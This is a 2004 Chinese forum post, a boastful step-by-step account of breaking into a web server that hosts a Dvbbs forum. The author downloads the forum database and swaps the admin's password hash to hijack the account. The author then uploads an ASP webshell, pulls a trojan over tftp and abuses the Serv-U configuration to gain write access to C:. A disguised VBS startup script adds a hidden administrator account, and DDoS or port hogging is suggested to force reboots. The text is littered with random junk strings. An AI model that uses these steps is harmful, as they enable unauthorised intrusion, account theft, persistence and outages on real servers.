|
今天心情不好,写一篇文章玩玩吧,利用网站的配置错误配合serv-u取得管理员权限,简单一点就是通过asp木马配合serv-u取得管理员权限,哈哈哈,是不是很cool阿! " R- Q# s6 Q( k. r
------------文章开始------------
/ \ Q7 ]& l8 `7 x# L6 L为了找仓木麻衣的mp3(这个小姑娘的歌很好听阿),把半个互联网都搜完了(太夸张了把),就是找不到,苦然眼镜一亮,哈哈哈×××论坛,看来人气不错,也有mp3的下载地址,那就去看看吧
" a) A) r. S3 p+ e( } s! Y晕~~~~,
, m' ]: c" p' j3 C' u. C' X论坛错误信息 6 |4 t F* b! c* k
产生错误的可能原因:
) H% p7 T( w# l9 V |6 q" ?9 V) D您是否仔细阅读了帮助文件,可能您还没有登陆或者不具有使用当前功能的权限。
' r8 d8 L/ |" x3 ^' \& I4 K$ A还要注册阿,可是论坛由于种种原因又不让注册 . E5 W- W4 i) D" m
气的我差点吐血! 0 X! D1 C# m2 A' \
怎么办阿???唉本想用溯雪破解几个密码。可是我们这个落后的地方上网贵,速度慢,有那个钱早就可以去买几张d版cd了,算了想想别的办法把,打开我的xscan,随便扫了一下,服务器挺安全阿,只开了21,80,3389端口 : Z: s8 K J' ]/ O3 G, u
看来做了端口过滤
* d3 @/ @7 }9 q9 V没什么可利用的漏洞怎么办,不要着急,他用的是动网论坛,先试着下载他的数据库试试吧 ; \, |9 m- D2 b, Y5 V
手动的找了一些,都不行 6 N' v2 l ~, B$ k8 z7 c1 S( h3 j
我先猜一下数据库在哪个目录里面,如果猜对的话下载数据库的成功率就比较高了
: m$ T* V6 b# z- B( h1 Thttp://aaa.com/data
l2 w; h- l8 mhttp://aaa.com/database
* u4 K4 R" F! M& l( L+ g$ shttp://aaa.com/db % N: V" ^/ R+ S. [% y; @ o
HTTP 错误 404 - 找不到文件
% ^7 W! U2 V5 H8 K9 ]" d3 ~8 b( c6 wInternet 信息服务 : [! C* ]+ b/ P# n
继续 4 ]: B7 A: |$ `7 T8 L* l
http://aaa.com/mdb
1 \; A, c; w& i2 e& xHTTP 错误 403 - 禁止访问 ( f S0 a$ A$ j2 }' t/ `
Internet Explorer % N X8 b0 N& q' r) r! _
把我以前些的添加的数据库地址文件载入xscan(专门下载数据库的地址),然后只扫描cgi漏洞 8 p. M0 M+ `8 i$ w
scaning.......,大概10分钟过去了 7 E- N) s# M) z5 _1 X; a' O- E
扫描结果
% g% o8 c" e1 t$ {" l/mdb/lovemaik.asa [漏洞描述]
* E6 u5 J ^. a1 @7 ~! b0 e# h, ?! j哈哈哈,成功的扫到了数据库 ! U0 n& I4 Y1 x# }
顺便告诉大家一个技巧,把一些常用的数据库地址如data.mdb,database.asp等等添加到xscan的cgi数据库中,或者单独作一个数据库,你可以用一些字典来生成数据库地址,这样的成功率很高的!
3 g9 Q; Z+ ^$ n+ @4 _打开Net Transport(一种很爽的下载工具)把数据库down过来,用了50多分钟,终于下载完了
& e# [" {+ n" V9 s1 J在自己的机器上安装jmail和动网论坛,把下载的数据库覆盖新数据库,接着注册用户:allen,密码:123456 1 @5 ^5 g5 z7 y1 d7 f
调然后把数据库扩展名改为.mdb ,打开 $ A( r) M. p, p6 K0 k
查看我们刚才注册的用户密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密,所以不那得到明文密码)
4 W) K- K- z3 Y3 l好的把这一串数据复制一下,然后找到管理员的名字,也就是查找userclass表中数据为管理员的名字 " |5 I$ B# ]6 {. C
把他的密码改成49ba59abbe56e057,记住在改密码之前一定要把他的密码(经过MD5加密过的)复制到一个记事本里
# B: J7 w C2 Z好了,我们用管理员的名字登陆,密码就是123456,接着我们就去修改用户资料,把回答问题和答案改掉!把email换成自己的,接着把刚才注册的用户allen提升为管理员,退出,在用allen帐号登陆,把原来的管理员降成普通用户,可能有些会问这样做是为什么,原因是动网论坛不允许管理员通过email取回密码,接着在打开数据库把原来管理员的密码给恢复了,在打开论坛,忘记密码-回答问题-取回密码,哈哈哈,快打开你的信箱把,密码已经发到你信箱了(注意,你的系统最好装jmail等邮件发送组件,要不然就会发不了邮件的)
: t9 ^6 z: Y" G" b! }+ l5 p现在我们拿到了论坛管理员的密码了,登陆那个论坛-进入管理页面-论坛版面管理 -随便选一个讨论区-在上传文件类型中加上.asp,呵呵 " j7 x- W! d; R! {
好了,进去这个讨论区发表帖子-上传文件,呵呵,把asp木马传上去
$ {7 t1 W' {5 q- U( h( V好了,可是这个文件被重命名了,唉,新亏手里还有一个免fso的木马,只有一个文件。传上去
. b+ J2 Z( `1 w( w+ h+ Y( W/ i: ]可惜这个木马不好用,还是自己的木马用着顺手,于是tftp -i ***.***.***.*** GET use.asp , X4 @. g( N4 z! L6 G
好了,成功了,接这运行木马www.***.com/bbs/use.asp?id=1 " z2 Y! n+ w" i% Y* n
呵呵,服务器的东西清清楚楚的摆在我们面前了,上传一个winshell把 ' _8 F4 O' |# ]: q% B
靠,服务器有病毒防火墙,看看是nav的,算了,自己加个壳把
' @* h; ^* Z: M( L3 w继续,传上去并执行。。。。没反应! ' {' |/ ]) T1 z4 w
先telnet ip 8210(我喜欢用noika手机的型号做为端口,^_^) 7 U0 h! ]3 I4 T5 L! N! y. a' l
靠,不行,差点忘了,对方做端口过滤了
1 `) i V8 G: n" o怎么办阿,试试idq.dll(没报什么希望),果然对方的目录不可执行,在看一下对方有没有装perl
! L1 v- R+ w" v. i3 Z5 l ~还是没有!在看看对方是什么分区格式,要是fat32那就好办了,试着删除c:\的任何文件都提示没有权限!唉,麻烦阿!!!
( a* z4 H9 |. p本来想就此打住的时候突然发现了d:\Serv-U,于是我就想通过他来拿到权限
4 p/ u6 H2 `' S" l$ ]注:在此之前最好在自己的机器上装一个Serv-U,
2 z/ I9 i& ?/ Y, ~8 @. A我们先看看ServUStartUpLog.txt ; r6 y3 v5 V5 a) C j
Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright (c) 1995-2002 Cat 5 q2 N k& Q1 d% c* ]" P& }$ J3 J
。。。。。。。。。。
1 C" K; |9 l I& G4 u7 a版本挺新阿,呵呵
' j; J( p4 C5 `5 v! C( s7 E+ A- A1 J接着看看ServUDaemon.ini(用户配置文件)
: Y; H* g# K, W6 t' m哇考,里面的用户真多阿!
! B! r8 v. X1 p9 ?* ^# U% z1 {! d接着我们把这个文件的内容复制一下,然后粘贴到本地serv-u的ServUDaemon.ini文件中,记住这时候最好停掉你的serv-u,保存文件,接着打开ServUAdmin.exe,重新添加一个用户,记住这个用户最好是管理员权限,必须对目录和文件可以进行读写可执行等一切操作,接着把用户主目录设为c:\ * @8 [2 a* |+ t$ S c( w3 f
哈哈哈,到次为止大家都知道我的用意了把! - B3 D+ q/ e8 L6 L
接这ftp上去
8 Z! K) H R1 I! D! c哈哈c盘的东西全部暴露了,现在我们对c盘有读写权限,可以进行任何操作(注意:serv-u的管理员权限和nt的管理员权限不是一样的,serv-u的管理员只能配置serv-u) L3 C/ r h* n, N
由于对方做了端口过滤,办法不是很多,可以参考一篇修改注册表根改端口过滤的文章,是灰色轨迹论坛的一个网友写的,哈哈,在这里就不多说了! 7 n& f$ q" ]/ E9 b# o% U4 a
我们先写一个vbs脚本,把这个脚本重命名为Adobe Gamma Loader,这样管理员不容易发现! & I9 A4 z; t: z
脚本内容:
# f- R6 P3 X8 o- y+ l( bset wshshell=createobject ("wscript.shell" ) 3 T3 r5 o. g y7 {1 l3 e& b |: ^( s
a=wshshell.run ("cmd.exe /c net user allen ***** /add",0) * h/ f# P; F% B0 M4 i
b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)
" L' Y# T2 K, r; y1 q$ ?大家都能看懂把,哈哈 + w# r3 Y g* c
然后把他传到Documents and Settings\All Users\「开始」菜单\程序\启动\
/ f/ Z2 l. l$ j ?5 m2 y B呵呵为什么要vbs脚本呢?原因很简单,就是不让管理员看见那个跳出来的黑黑的dos窗口。 7 [ f _1 o& A" |
接着用asp木马上传一个shutdown.exe
0 p% m( c0 L: M5 \然后执行shutdown.exe 127.0.0.1 /r ) N) I( t$ n/ @9 K! u0 S2 Z
哈哈,有时候可能不会成功,是权限的原因,具体。。。我也不太清楚。
4 ^) D! O+ s+ v$ j4 p" m不过在nt or 2000上普通用户都可以重起机器 & U. X# z; d3 J; F5 e( t2 z% T
还有一个办法就是在你的机器上新建一个计划任务,内容就是定时重启动计算机,然后把他放到对方计划任务的目录下,如果对方没有开计划任务就不行了! 0 F. W- ?7 V" y
如果还是成功不了你就用ddos把,哈哈,很暴力的让对方拒绝服务,接这就会重启(有可能是管理员操作的)
G4 W9 d' @ f重启之后只要管理员登陆就可以添加一个帐号,哈哈 , Z) J6 J3 }; Y
到此为止我已经拥有了管理员权限,呵呵
3 i. X8 @& M9 h; v# s0 C2 R6 H$ ]! }; H+ V! S! Y! W0 G$ }
(关于端口过滤) 8 P$ L% [8 H6 A. G- V: d
一般服务器至少会开21,80端口,像这种情况,即使有了管理员权限也没有多大用处!
! X: l# j' J. w* t: Y7 x如果你可以得到一些bbs或者其他程序的管理员密码就比较好办了
4 h, a% t: f* w7 w先传asp木马,然后用sc停掉ftp服务,接着弄一些后门来占用21端口
' X4 D5 g H4 Y6 p( o或者干脆暴力的占用!不过这些办法在ntfs的分区上成功率并不高!经过实践我发现一般可以暴力占用80端口,前提是对方web服务器为iis!这样在你没有完全拿到管理员权限之前,对方的网站可能会一直瘫痪,哈哈! * _, E4 e5 O, E. U) c1 N' A
| 
IP卡
狗仔卡
发表于 2004-10-6 02:09
转播
淘帖
分享
收藏
支持
反对
微信
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
显身卡
